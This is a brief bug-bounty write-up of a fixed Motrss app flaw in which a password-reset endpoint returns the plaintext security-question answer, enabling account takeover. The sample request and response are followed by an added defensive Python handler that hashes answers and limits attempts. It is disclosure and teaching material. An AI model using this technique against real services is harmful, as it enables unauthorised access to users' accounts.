Motrss Account Takeover

Dipak Kumar Das
Hi guys, here is a simple write-up of mine on a Motrss account takeover. Motrss is a one-stop solution for all automobile services: in just a few clicks, you can book your next vehicle servicing, repair and maintenance appointment.

It is an Android app, and one of its endpoints disclosed sensitive information. Using that information, an attacker can take over any user account.

The issue was in the reset password functionality.

Here is the password reset request:

POST /GetUserSecurityQuestion
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

And here is the response:

HTTP/1.1 200 OK
Date: Tue, 17 Jan 2017 09:58:41 GMT
Server: Apache
Content-Length: 116
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"Success","Data":[{"id":"7","questions":"What is your dream Job?","signup_status":"N","answer":"Google"}]}

The response reflects the answer to the security question.

From there, the attacker just uses that answer to create a new password and log in.

Here is the video proof of concept.

Status: Fixed
Bounty Rewarded
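
The response above leaks the answer because the server sends the whole security-question record to the client. The following is an added example (not Motrss code, and not the fix they shipped) of a server-side handler that returns only the question fields and checks the submitted answer against a salted hash with an attempt limit. The class and method names, the in-memory store and the lockout threshold are assumptions.

```python
import hashlib
import hmac
import os

MAX_ATTEMPTS = 5  # assumed lockout threshold


def _hash_answer(answer: str, salt: bytes) -> bytes:
    # Normalise case and whitespace, then stretch so the stored value is not reversible.
    norm = " ".join(answer.lower().split()).encode()
    return hashlib.pbkdf2_hmac("sha256", norm, salt, 200_000)


class ResetService:
    def __init__(self):
        self._users = {}  # user -> record (in-memory stand-in for the database)

    def enroll(self, user, question_id, question, answer):
        salt = os.urandom(16)
        self._users[user] = {
            "id": question_id,
            "questions": question,
            "salt": salt,
            "answer_hash": _hash_answer(answer, salt),  # plaintext answer is never stored
            "failed": 0,
        }

    def get_security_question(self, user):
        rec = self._users.get(user)
        if rec is None:
            return {"status": "Fail", "Data": []}
        # Allow-list the fields sent to the client: no answer, no hash, no salt.
        return {"status": "Success",
                "Data": [{"id": rec["id"], "questions": rec["questions"]}]}

    def verify_answer(self, user, submitted):
        rec = self._users.get(user)
        if rec is None or rec["failed"] >= MAX_ATTEMPTS:
            return False  # unknown user or locked out
        candidate = _hash_answer(submitted, rec["salt"])
        ok = hmac.compare_digest(candidate, rec["answer_hash"])  # constant-time compare
        rec["failed"] = 0 if ok else rec["failed"] + 1
        return ok


if __name__ == "__main__":
    svc = ResetService()
    svc.enroll("alice", "7", "What is your dream Job?", "Google")  # constructed sample user
    print(svc.get_security_question("alice"))
    print(svc.verify_answer("alice", "Google"))
```

The password change itself should only be accepted after `verify_answer` succeeds on the server, never on the client's say-so.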

